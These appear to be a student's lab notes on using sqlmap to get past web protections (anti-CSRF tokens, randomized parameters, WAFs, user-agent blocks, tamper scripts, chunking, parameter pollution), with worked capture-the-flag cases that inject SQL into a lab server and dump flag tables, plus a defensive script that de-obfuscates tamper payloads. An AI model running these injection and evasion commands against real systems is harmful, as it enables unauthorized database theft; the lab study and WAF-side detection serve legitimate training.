# Anti-CSRF Token Bypass

- One of the first lines of defense against the usage of automation tools is the incorporation of anti-CSRF tokens into all HTTP requests, especially those generated as a result of web-form filling
- In most basic terms, each HTTP request in such a scenario should have a (valid) token value available only if the user actually visited and used the page
- While the original idea was the prevention of scenarios with malicious links, this security feature also hardened against automation
- SQLMap has options that can help in bypassing anti-CSRF protection. Namely, the most important option is `--csrf-token`
- By specifying the token parameter name (which should already be available within the provided request data), SQLMap will automatically attempt to parse the target response content and search for fresh token values so it can use them in the next request

```bash
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
```

# Unique Value Bypass

- In some cases, the web application may only require unique values to be provided inside predefined parameters
- Such a mechanism is similar to the anti-CSRF technique described above, except that there is no need to parse the web page content
- For this, the option `--randomize` within SQLMap should be used, pointing to the parameter name containing a value which should be randomized before being sent

```bash
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI
```

# Calculated Parameter Bypass

- Another similar mechanism is where a web application expects a proper parameter value to be calculated based on some other parameter value(s)
- Most often, one parameter value has to contain the message digest (e.g., `h=MD5(id)`) of another one
- To bypass this, the option `--eval` should be used, where valid Python code is evaluated just before the request is sent to the target

```bash
sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI
```

# IP Address Concealing

- In case we want to conceal our IP address, or if a certain web application has a protection mechanism that blacklists our current IP address, we can try to use a proxy
- A proxy can be set with the option `--proxy` (e.g. `--proxy="socks4://177.39.187.70:33283"`), where we should add a working proxy
- In addition to that, if we have a list of proxies, we can provide them to SQLMap with the option `--proxy-file`
- This way, SQLMap will go sequentially through the list, and in case of any problems (e.g., blacklisting of the IP address), it will just skip from the current one to the next in the list

# WAF Bypass

- Whenever we run SQLMap, as part of the initial tests, SQLMap sends a predefined malicious-looking payload using a non-existent parameter name (e.g., `?pfov=...`) to test for the existence of a WAF
- There will be a substantial change in the response compared to the original in case of any protection between the user and the target
- For example, if one of the most popular WAF solutions (ModSecurity) is implemented, there should be a `406 - Not Acceptable` response after such a request
- In case of a positive detection, to identify the actual protection mechanism, SQLMap uses a third-party library [identYwaf](https://github.com/stamparm/identYwaf), containing the signatures of 80 different WAF solutions
- If we wanted to skip this heuristic test altogether (i.e., to produce less noise), we can use the switch `--skip-waf`

# User-agent Blacklisting Bypass

- In case of immediate problems (e.g., HTTP error code 5XX from the start) while running SQLMap, one of the first things we should think of is the potential blacklisting of the default user-agent used by SQLMap (e.g. `User-agent: sqlmap/1.4.9 (http://sqlmap.org)`)
- This is trivial to bypass with the switch `--random-agent`, which replaces the default user-agent with a randomly chosen value from a large pool of values used by browsers

# Tamper Scripts

- One of the most popular mechanisms implemented in SQLMap for bypassing WAF/IPS solutions is the so-called "tamper" scripts
- Tamper scripts are a special kind of (Python) scripts written for modifying requests just before being sent to the target, in most cases to bypass some protection
- Tamper scripts can be chained, one after another, within the `--tamper` option (e.g. `--tamper=between,randomcase`), where they are run based on their predefined priority
- To get the whole list of implemented tamper scripts, along with descriptions as in the table below, the switch `--list-tampers` can be used

|**Tamper-Script**|**Description**|
|---|---|
|`0eunion`|Replaces instances of UNION with e0UNION|
|`base64encode`|Base64-encodes all characters in a given payload|
|`between`|Replaces greater than operator (`>`) with `NOT BETWEEN 0 AND #` and equals operator (`=`) with `BETWEEN # AND #`|
|`commalesslimit`|Replaces (MySQL) instances like `LIMIT M, N` with `LIMIT N OFFSET M` counterpart|
|`equaltolike`|Replaces all occurrences of operator equal (`=`) with `LIKE` counterpart|
|`halfversionedmorekeywords`|Adds (MySQL) versioned comment before each keyword|
|`modsecurityversioned`|Embraces complete query with (MySQL) versioned comment|
|`modsecurityzeroversioned`|Embraces complete query with (MySQL) zero-versioned comment|
|`percentage`|Adds a percentage sign (`%`) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)|
|`plus2concat`|Replaces plus operator (`+`) with (MsSQL) function CONCAT() counterpart|
|`randomcase`|Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)|
|`space2comment`|Replaces space character ( ) with comments (`/**/`)|
|`space2dash`|Replaces space character ( ) with a dash comment (`--`) followed by a random string and a new line (`\n`)|
|`space2hash`|Replaces (MySQL) instances of space character ( ) with a pound character (`#`) followed by a random string and a new line (`\n`)|
|`space2mssqlblank`|Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters|
|`space2plus`|Replaces space character ( ) with plus (`+`)|
|`space2randomblank`|Replaces space character ( ) with a random blank character from a valid set of alternate characters|
|`symboliclogical`|Replaces AND and OR logical operators with their symbolic counterparts (`&&` and `\|\|`)|
|`versionedkeywords`|Encloses each non-function keyword with (MySQL) versioned comment|
|`versionedmorekeywords`|Encloses each keyword with (MySQL) versioned comment|

# Misc Bypasses

- Out of other protection bypass mechanisms, there are also two more that should be mentioned

## Chunking

- The first one is the `Chunked` transfer encoding, turned on using the switch `--chunked`, which splits the POST request's body into so-called "chunks"
- Blacklisted SQL keywords are split between chunks in a way that the request containing them can pass unnoticed

## HTTP Parameter Pollution

- The other bypass mechanism is `HTTP parameter pollution` (`HPP`), where payloads are split in a similar way as in the case of `--chunked`, between different values of the same-named parameter (e.g. `?id=1&id=UNION&id=SELECT&id=username,password&id=FROM&id=users...`), which are concatenated by the target platform if it supports this behaviour (e.g. `ASP`)

# Exercise

## Case 8

- Detect and exploit SQLi vulnerability in POST parameter id, while taking care of the anti-CSRF protection
- There's a PHPSESSID cookie and an anti-CSRF token

![[images/Pasted image 20251209193726.png]]

- Specify the non-standard token name
- Getting somewhere

```bash
sqlmap -u "http://94.237.121.111:40941/case8.php" --data="id=1&t0ken=oVk30ug0Rxbpb7klNljoHZnocV38BROvOg44FwXBNs" --csrf-token="t0ken"
```

![[images/Pasted image 20251209194820.png]]

- Now additionally specify the table name to dump

```bash
sqlmap -u "http://94.237.121.111:40941/case8.php" --data="id=1&t0ken=oVk30ug0Rxbpb7klNljoHZnocV38BROvOg44FwXBNs" --csrf-token="t0ken" -T flag8 --dump
```

![[images/Pasted image 20251209194853.png]]

## Case 9

- Detect and exploit SQLi vulnerability in GET parameter id, while taking care of the unique uid

![[images/Pasted image 20251209195212.png]]

- Attempt 1: uid = anti-csrf token
- Failure

```bash
sqlmap -u "http://94.237.121.111:40941/case9.php" --data="id=1&uid=3394455602" --csrf-token="uid" -T flag9 --dump
```

![[images/Pasted image 20251209195615.png]]

- Attempt 2: include cookie
- Still a failure

```bash
sqlmap -u "http://94.237.121.111:40941/case9.php" --data="id=1&uid=3394455602" --csrf-token="uid" -T flag9 --dump cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2'
```

![[images/Pasted image 20251209195819.png]]

- Attempt 3: use hint to randomize uid
- Failure

```bash
sqlmap -u "http://94.237.121.111:40941/case9.php" --data="id=1&uid=3394455602" --randomize=uid -T flag9 --dump cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2'
```

![[images/Pasted image 20251209200202.png]]

- Attempt 4: remove `--data`
- Success!

```bash
sqlmap -u "http://94.237.121.111:40941/case9.php?id=1&uid=3394455602" --randomize=uid -T flag9 --dump --cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2'
```

![[images/Pasted image 20251209200338.png]]

## Case 10

- Detect and exploit SQLi vulnerability in POST parameter id

![[images/Pasted image 20251209200533.png]]

- Attempt 1: specify cookie and POST method
- Failure

```bash
sqlmap -u "http://94.237.121.111:40941/case10.php?" --data="id=1" -T flag10 --dump --cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' --method POST
```

![[images/Pasted image 20251209200908.png]]

- Attempt 2: Intercept sqlmap requests with Burp based on hint
- Use `--data` for id because id is in the body, not in the URL itself

```bash
sqlmap -u "http://94.237.121.111:40941/case10.php?" --data="id=1" -T flag10 --dump --cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' --method POST --proxy=http://127.0.0.1:8080
```

- View of one of the requests from sqlmap

![[images/Pasted image 20251209201452.png]]

- Attempt 3: Use `--random-agent` based on hint
- Success!

```bash
sqlmap -u "http://94.237.121.111:40941/case10.php?" --data="id=1" -T flag10 --dump --cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' --method POST --random-agent
```

![[images/Pasted image 20251209201727.png]]

## Case 11

- Detect and exploit SQLi vulnerability in GET parameter id
- Filtering of characters '<', '>'

![[images/Pasted image 20251209202259.png]]

- Attempt 1: try the `between` tamper script to handle less than and greater than filtering

```bash
sqlmap -u "http://94.237.121.111:40941/case11.php?id=1" -T flag11 --dump --cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' --tamper=between
```

![[images/Pasted image 20251209202510.png]]
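The tamper scripts in the table above (and `between`, used in Case 11) obfuscate the payload lexically, so a WAF rule matching on `UNION`/`SELECT` misses them. As an added example (not sqlmap's code or part of these notes), here is a WAF-side canonicaliser that reverses the purely lexical transformations (`space2comment`, `space2plus`, `space2dash`/`space2hash`, `randomcase`, `percentage`, the versioned-comment scripts and `0eunion`) so the rule sees the tokens the database will parse; the sample payloads are constructed, and operator rewrites such as `between` or `equaltolike` are semantic and are deliberately not undone.

```python
"""WAF-side canonicaliser for payloads obfuscated by lexical sqlmap tamper scripts.

Added example, not sqlmap code: each step reverses one documented transformation
so that a keyword rule sees what MySQL/MsSQL will actually tokenise.
"""
import re
from urllib.parse import unquote_plus

SQL_KEYWORDS = {"SELECT", "UNION", "FROM", "WHERE", "AND", "OR", "LIMIT",
                "OFFSET", "LIKE", "BETWEEN", "CONCAT", "INFORMATION_SCHEMA"}


def normalize(payload: str) -> str:
    """Undo the lexical tamper transformations and return an upper-cased payload."""
    s = unquote_plus(payload)                       # space2plus: '+' -> ' ', %2F -> '/'
    s = re.sub(r"%(?=[A-Za-z_])", "", s)            # percentage: %S%E%L -> SEL (only non-hex '%' survive unquote)
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s)   # versioned / zero-versioned: /*!00000UNION*/ -> UNION
    s = re.sub(r"/\*.*?\*/", " ", s)                # space2comment: /**/ -> ' '
    s = re.sub(r"(--|#)[^\n]*\n", " ", s)           # space2dash / space2hash: --rand\n -> ' '
    s = re.sub(r"(\d)e0(?=[A-Za-z])", r"\1 ", s)    # 0eunion: 1e0UNION -> 1 UNION
    s = re.sub(r"\s+", " ", s).strip()              # collapse the whitespace we just produced
    return s.upper()                                # randomcase: uNiOn -> UNION


def sql_keywords(payload: str) -> list:
    """Canonical SQL keywords present in the de-obfuscated payload (sorted)."""
    tokens = re.findall(r"[A-Z_]+", normalize(payload))
    return sorted(set(tokens) & SQL_KEYWORDS)


# Constructed samples of what one payload looks like after each tamper script.
SAMPLES = {
    "space2comment+randomcase": "1/**/uNiOn/**/SeLeCt/**/1,2",
    "percentage": "1 %U%N%I%O%N %S%E%L%E%C%T 1,2",
    "versionedkeywords": "1 /*!UNION*//*!00000SELECT*/ 1,2",
    "space2dash": "1--xk3a\nUNION--q9\nSELECT 1,2",
    "0eunion": "1e0UNION SELECT 1,2",
    "space2plus": "1+AND+1=1",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:25} {raw!r:40} -> {normalize(raw)!r} {sql_keywords(raw)}")
```

Every sample except `space2plus` canonicalises to `1 UNION SELECT 1,2`, which is the string a plain keyword rule should be matched against.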